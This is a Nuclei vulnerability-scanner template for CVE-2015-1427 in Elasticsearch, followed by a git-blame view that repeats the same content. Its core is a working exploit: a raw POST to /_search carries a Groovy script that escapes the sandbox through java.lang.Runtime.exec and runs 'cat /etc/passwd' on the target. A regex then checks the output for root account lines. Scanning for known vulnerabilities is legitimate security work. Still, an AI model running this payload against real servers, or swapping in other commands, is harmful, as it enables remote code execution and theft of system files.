nuclei-templates/cves/2015/CVE-2015-1427.yaml

id: CVE-2015-1427

info:
  name: ElasticSearch 1.4.0/1.4.2 RCE
  author: pikpikcu
  severity: critical
  description: The Groovy scripting engine in Elasticsearch before 1.3.8 and 1.4.x before 1.4.3 allows remote attackers to bypass the sandbox protection mechanism and execute arbitrary shell commands via a crafted script.
  reference: |
    - https://blog.csdn.net/JiangBuLiu/article/details/94457980
    - http://www.elasticsearch.com/blog/elasticsearch-1-4-3-1-3-8-released/
  tags: cve,cve2015,elastic,rce

requests:
  - raw:
      - |
        POST /website/blog/ HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Accept-Language: en
        User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
        Connection: close
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 343

        {
          "name": "test"
        }
      - |
        POST /_search HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Accept-Language: en
        User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
        Connection: close
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 343

        {"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"cat /etc/passwd\").getText()"}}}

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "application/json"
        part: header

      - type: regex
        regex:
          - "root:[x*]:0:0:"
        part: body

      - type: status
        status:
          - 200
Create CVE-2015-1427.yaml 2021-02-15 18:17:25 +00:00			`id: CVE-2015-1427`

			`info:`
			`name: ElasticSearch 1.4.0/1.4.2 RCE`
			`author: pikpikcu`
			`severity: critical`
Description and references 2021-04-22 09:04:36 +00:00			`description: The Groovy scripting engine in Elasticsearch before 1.3.8 and 1.4.x before 1.4.3 allows remote attackers to bypass the sandbox protection mechanism and execute arbitrary shell commands via a crafted script.`
			`reference: \|`
			`- https://blog.csdn.net/JiangBuLiu/article/details/94457980`
			`- http://www.elasticsearch.com/blog/elasticsearch-1-4-3-1-3-8-released/`
tag improvements 2021-03-18 07:54:36 +00:00			`tags: cve,cve2015,elastic,rce`
Create CVE-2015-1427.yaml 2021-02-15 18:17:25 +00:00
			`requests:`
			`- raw:`
			`- \|`
			`POST /website/blog/ HTTP/1.1`
			`Host: {{Hostname}}`
			`Accept: /`
			`Accept-Language: en`
			`User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)`
			`Connection: close`
			`Content-Type: application/x-www-form-urlencoded`
			`Content-Length: 343`

			`{`
			`"name": "test"`
			`}`
			`- \|`
			`POST /_search HTTP/1.1`
			`Host: {{Hostname}}`
			`Accept: /`
			`Accept-Language: en`
			`User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)`
			`Connection: close`
			`Content-Type: application/x-www-form-urlencoded`
			`Content-Length: 343`

			`{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"cat /etc/passwd\").getText()"}}}`

			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`words:`
			`- "application/json"`
			`part: header`

			`- type: regex`
			`regex:`
			`- "root:[x*]:0:0:"`
			`part: body`

			`- type: status`
			`status:`
			`- 200`